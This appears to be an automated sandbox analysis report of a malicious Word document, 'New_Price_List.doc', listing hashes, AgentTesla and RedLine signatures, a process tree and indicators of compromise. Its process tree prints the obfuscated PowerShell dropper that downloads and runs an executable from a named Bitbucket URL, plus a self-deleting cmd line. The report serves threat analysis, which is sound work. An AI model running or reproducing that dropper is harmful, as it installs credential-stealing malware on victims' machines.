Analysis
-
max time kernel
276s -
max time network
279s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-11-2020 01:22
Static task
static1
Behavioral task
behavioral1
Sample
New_Price_List.doc
Resource
win10v20201028
General
-
Target
New_Price_List.doc
-
Size
22KB
-
MD5
55270b0cc9a3fda4609e29c4e1cda566
-
SHA1
edeffab799a9ac347724e5f6a7aecaa087b452c6
-
SHA256
86131b3185958bd9ece75c484ff8ababf6048b67f3c988d01eb3b9fd3bd1f959
-
SHA512
2cf4b8955af2e7415bd40e6c629e4cc18797d3c410e7f741ed94952cd72bc04913f3818071efd7ee4822263802754e034dbe2a4f9d2c7f612727ffe03a4e3d58
Malware Config
Extracted
https://bitbucket.org/cryptexxx/files/downloads/Gilbert.exe
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1920 3328 powershell.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Processes:
resource yara_rule behavioral1/memory/1712-24-0x0000000002F20000-0x0000000002F43000-memory.dmp agent_tesla behavioral1/memory/1712-26-0x0000000002FD0000-0x0000000002FF2000-memory.dmp agent_tesla -
Blacklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 23 1920 powershell.exe 25 1920 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
hmpkjcvy.exepid process 4016 hmpkjcvy.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 38 checkip.amazonaws.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
hmpkjcvy.exedescription pid process target process PID 4016 set thread context of 1712 4016 hmpkjcvy.exe AddInProcess32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 492 WINWORD.EXE 492 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeAddInProcess32.exepid process 1920 powershell.exe 1920 powershell.exe 1920 powershell.exe 1712 AddInProcess32.exe 1712 AddInProcess32.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
WINWORD.EXEpid process 492 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exehmpkjcvy.exeAddInProcess32.exedescription pid process Token: SeDebugPrivilege 1920 powershell.exe Token: SeDebugPrivilege 4016 hmpkjcvy.exe Token: SeDebugPrivilege 1712 AddInProcess32.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
Processes:
WINWORD.EXEpid process 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE 492 WINWORD.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
powershell.exehmpkjcvy.exeAddInProcess32.execmd.exedescription pid process target process PID 1920 wrote to memory of 4016 1920 powershell.exe hmpkjcvy.exe PID 1920 wrote to memory of 4016 1920 powershell.exe hmpkjcvy.exe PID 1920 wrote to memory of 4016 1920 powershell.exe hmpkjcvy.exe PID 4016 wrote to memory of 1712 4016 hmpkjcvy.exe AddInProcess32.exe PID 4016 wrote to memory of 1712 4016 hmpkjcvy.exe AddInProcess32.exe PID 4016 wrote to memory of 1712 4016 hmpkjcvy.exe AddInProcess32.exe PID 4016 wrote to memory of 1712 4016 hmpkjcvy.exe AddInProcess32.exe PID 4016 wrote to memory of 1712 4016 hmpkjcvy.exe AddInProcess32.exe PID 4016 wrote to memory of 1712 4016 hmpkjcvy.exe AddInProcess32.exe PID 4016 wrote to memory of 1712 4016 hmpkjcvy.exe AddInProcess32.exe PID 4016 wrote to memory of 1712 4016 hmpkjcvy.exe AddInProcess32.exe PID 4016 wrote to memory of 1712 4016 hmpkjcvy.exe AddInProcess32.exe PID 1712 wrote to memory of 3612 1712 AddInProcess32.exe cmd.exe PID 1712 wrote to memory of 3612 1712 AddInProcess32.exe cmd.exe PID 1712 wrote to memory of 3612 1712 AddInProcess32.exe cmd.exe PID 3612 wrote to memory of 812 3612 cmd.exe PING.EXE PID 3612 wrote to memory of 812 3612 cmd.exe PING.EXE PID 3612 wrote to memory of 812 3612 cmd.exe PING.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\New_Price_List.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe INvOkE-EXpRessiOn((('t9Qclien'+'t '+'= new'+'-'+'object S'+'ys'+'tem.Net.'+'WebClient'+';t9Qa'+' = AEi'+'https://bitbucket.org/cryptexxx/files/downloads/Gilbert.exe'+'AEi.Spl'+'i'+'t'+'('+'AEi'+','+'AEi);t9Qhu'+'as = '+'t'+'9Q'+'env:temp'+' + AEi'+'c4g'+'hmpkjcvy.exe'+'AEi;for'+'each'+'(t9'+'Q'+'b'+' in t9Qa)'+'{try{t9Qclie'+'nt'+'.DownloadFil'+'e(t9Qb.ToS'+'t'+'ring()'+','+' '+'t9Qhuas);I'+'nvoke-Item(t9Qhua'+'s);'+'b'+'reak;}catch{'+'write-hos'+'t t'+'9Q'+'_.Exce'+'ption.Me'+'ssa'+'ge'+'}};') -rePlacE't9Q',[ChAr]36 -crEPLacE'c4g',[ChAr]92 -crEPLacE'AEi',[ChAr]39) )1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Users\Admin\AppData\Local\Temp\hmpkjcvy.exe"C:\Users\Admin\AppData\Local\Temp\hmpkjcvy.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.1 -n 3 > nul & del ""4⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 35⤵
- Runs ping.exe
PID:812
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
b910d098d644bee45252c629331ccae0
SHA13a86437e237d1be4e614a9358df17ddc259ff4e0
SHA256ff7bf97b76ceb52b9a866f82b3b57be94381ac907e1e9689516038f79ea93e95
SHA512bfc526db127d7c7643307b39f085b1de17450a0ed340556cb38ac4812484600093687743e7e958cc97f28652682d59f8c9ce92970d2f9a6270f32911a87d4d03
-
MD5
b910d098d644bee45252c629331ccae0
SHA13a86437e237d1be4e614a9358df17ddc259ff4e0
SHA256ff7bf97b76ceb52b9a866f82b3b57be94381ac907e1e9689516038f79ea93e95
SHA512bfc526db127d7c7643307b39f085b1de17450a0ed340556cb38ac4812484600093687743e7e958cc97f28652682d59f8c9ce92970d2f9a6270f32911a87d4d03